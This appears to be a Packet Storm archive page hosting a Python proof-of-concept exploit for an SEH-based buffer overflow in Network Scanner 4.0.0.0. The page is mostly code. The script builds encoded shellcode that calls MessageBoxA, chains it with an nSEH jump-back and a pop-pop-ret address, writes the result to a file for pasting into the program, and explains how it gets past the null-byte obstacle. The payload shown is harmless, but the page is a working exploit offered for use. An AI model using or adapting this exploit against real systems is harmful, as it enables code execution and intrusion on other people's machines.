what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Network Scanner 4.0.0.0 SEH Overflow

Network Scanner 4.0.0.0 SEH Overflow
Posted Oct 25, 2016
Authored by n30m1nd

Network Scanner version 4.0.0.0 SEH overflow exploit.

tags | exploit, overflow
SHA-256 | 85c3395f61aff99ba26155551063c1e183aaf9399f6541a8426dcf9216803c46
Download | Favorite | View

Network Scanner 4.0.0.0 SEH Overflow

Change Mirror Download
#!/usr/bin/python
# -*- coding: utf-8 -*-
 
### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ### 
 
# Date: 2016-10-21
# Exploit Author: n30m1nd
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
# Vendor Homepage: http://www.mitec.cz/
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
# Version: 4.0.0.0
# Tested on: Win7 64bit and Win10 64 bit
 
# Credits
# =======
# PoC by: INSECT.B - http://binsect00.tistory.com
#   https://www.exploit-db.com/exploits/39447/
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
 
# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time
 
# Exploit code
# ============
 
import struct
 
# MessageBoxA in NetScan.exe => 004042F1
mbox =  (
        "\x25\x41\x41\x41"
        "\x41\x25\x32\x32"
        "\x32\x32\x50\x68"
        "\x70\x77\x6E\x64"
        "\x54\x5F\x50\x57"
        "\x57\x50\x35\x8E"
        "\x60\x60\x55\x35"
        "\x7F\x22\x20\x55"
        "\x50\xC3"
        )
# JUMP BACK to our shellcode! 
nseh =  (
        # xor al,51h;   Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
        "\x34\x51"
        # jne -32h;     Jump if ZF = 0
        "\x75\xCC"
        )
# pop pop ret => 00402E67
sehh = struct.pack("<L", 0x00402e67)
 
payl = "A" * (76-48)
payl+= mbox
payl+= "A"*(48-len(mbox))
payl+= nseh + sehh
 
with open("exploit.txt","wb") as f:
    f.write(payl[:-1])
print payl
 
"""
NOTE:
The original author of this PoC stated that it was not possible to be 
exploited since all addresses inside the binary contain the null byte.
As you can see in this exploit, the null byte is added by default at
the end because strings are null terminated when read from an input 
box. This is why we write the payload minus 1 byte, payl[:-1], because
we don't need to write the last null byte for the "pop pop ret" jump
in the "sehh" variable.
"""


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close